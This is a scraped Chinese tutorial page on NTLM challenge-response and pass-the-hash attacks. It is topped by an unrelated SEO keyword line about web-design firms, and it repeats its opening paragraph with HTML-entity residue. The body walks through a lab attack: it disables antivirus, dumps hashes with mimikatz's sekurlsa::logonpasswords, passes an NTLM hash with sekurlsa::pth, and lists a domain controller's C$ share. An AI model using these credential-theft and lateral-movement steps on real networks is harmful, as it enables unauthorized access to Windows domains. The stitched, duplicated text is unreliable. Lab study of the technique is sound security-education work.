济南定制网站制作公司,一个人制作网站,一个网站多少钱?,深圳专业做网页的公司概念
早期SMB协议明文在网络上传输数据#xff0c;后来诞生了LM验证机制#xff0c;LM机制由于过于简单#xff0c;微软提出了WindowsNT挑战/响应机制#xff0c;这就是NTLM。
哈希传递前提
同密码(攻击主机与实现主机两台要密码一致)。
NTLM协议
加密ntlm哈希
转换成…概念
早期SMB协议明文在网络上传输数据后来诞生了LM验证机制LM机制由于过于简单微软提出了WindowsNT挑战/响应机制这就是NTLM。
哈希传递前提
同密码(攻击主机与实现主机两台要密码一致)。
NTLM协议
加密ntlm哈希
转换成16进制——转换成加密——转换成MD4 NTLM协议用于远程登录。例如 22
原理
client(win10)将账户名(test)传给server。在server中判断本地账户名(test)是否存在没有就失败有的话生成challenge(随机生成的)查找user对应的NTLM哈希在sam里找使用哈希加密challenge生成一个net-ntlm hash存在内存中将challenge发送给client(win10)。client(win10)接受到challenge以后将自己的密码转换成NTLM哈希用生成的哈希加密challenge生成response将response发送给server。server对比自己内存中的net-ntlm hash与client(win10)发来的response是否一致。 哈希传递攻击
哈希传递攻击的前提
首先是管理员必须提前从不同用户变成管理员需要用户名和ntml哈希值如果对方主机在域内就使用域名如果不在域内就使用工作组环境的攻击方式
什么情况下会用哈希传递攻击
攻陷一台主机以后抓不到该主机用户的明文密码失陷主机和局域网内存在相同密码
哈希传递攻击
工具mimikatz
环境域控(server 2008)、客户机(win 7)
网段在同一网段都为NAT模式
域控(server)
静态IP10.1.1.1
在server中查看445是否开放 查看域控C盘 共享C盘在cmd中输入命令net share 客户端开始攻击win7 IP10.1.1.2 关闭杀毒软件
用mimikatz64位工具必须是system权限 在打开cmd命令解释器必须以管理员身份运行因为要用到mimikatz工具 进入mimikatz.exe 攻击利用
提升权限(注需以管理员权限运行)
privilege::debug获取内存中保存的登录信息
sekurlsa::logonpasswords 并抓到自己用户的哈希值NTLM 进行哈希攻击
sekurlsa::pth /user:administrator /domain:xiusafe.com /ntlm:32ed87bdb5fdc5e9cba88547376818d4 #pth是哈希传递domain后面跟的是域同时弹出一个新的cmd窗口 此时哈希值已经准备好但还未攻击
开始攻击
查看域控(server)C盘
dir \\10.1.1.1\c$与域控C盘进行对比 攻击成功
总结
哈希传递攻击是由于局域网内有多台主机存在相同密码造成的绕过ntlm认证。
